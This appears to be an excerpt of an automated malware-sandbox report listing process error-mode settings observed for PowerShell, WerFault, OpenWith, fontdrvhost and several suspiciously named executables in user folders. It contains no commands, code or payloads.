                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
